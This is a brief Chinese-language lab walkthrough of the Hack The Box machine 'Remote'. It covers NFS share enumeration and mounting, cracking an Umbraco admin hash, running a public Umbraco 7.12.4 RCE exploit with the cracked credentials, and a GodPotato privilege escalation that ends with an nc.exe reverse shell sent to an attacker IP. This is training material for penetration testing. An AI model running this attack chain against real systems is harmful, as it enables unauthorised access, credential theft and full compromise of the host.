CPTS Remote 复现

nmap -A -T4 -p- -n -Pn 10.10.10.180

111端口NFS
RPCBind + NFS，如果你发现服务 NFS，那么你可能能够列出和下载（也许还可以上传）文件：
NFS 是一个为 客户端/服务器 设计的系统，使用户能够像访问本地目录中的文件一样，无缝地通过网络访问文件。
默认端口：2049/TCP/UDP（版本 4 除外，只需要 TCP 或 UDP）。

这可以用来 获取 NFSv3 服务器的信息，例如 导出 列表、谁被 允许访问 这些导出，以及哪些客户端已连接（如果客户端在未告知服务器的情况下断开连接，这可能不

showmount -e 10.10.10.180

挂载

mount -t nfs 10.10.10.180:/site_backups ./site_backups -o nolock

好像是网站备份文件
枚举网站

写着Umbraco Forms是渲染此表单所必需的。安装非常简单，您只需前往后台的Umbraco Forms部分，点击安装即可！ 😃

来到了一个登陆页面

发现hash
adminadmin@htb.localb 8be16afba8c314ad33d812f22a04991b90e2aaa
尝试破解

john  --wordlist=/usr/share/wordlists/rockyou.txt ./hash

拿到凭据
admin@htb.local ： baconandcheese
成功登陆后台


版本为7.12.4，存在RCE命令执行
payload：
https://github.com/Jonoans/Umbraco-RCE

python3 exploit.py -u admin@htb.local -p baconandcheese -i 10.10.14.25 -w http://10.10.10.180

成功拿到shell

然后

whoami /all

发现SeImpersonatePrivilege，
上传nc和GodPotato

./GodPotato-NET4.exe -cmd "cmd /c C:\Users\Public\nc.exe 10.10.14.25 8080 -e cmd.exe"

成功提权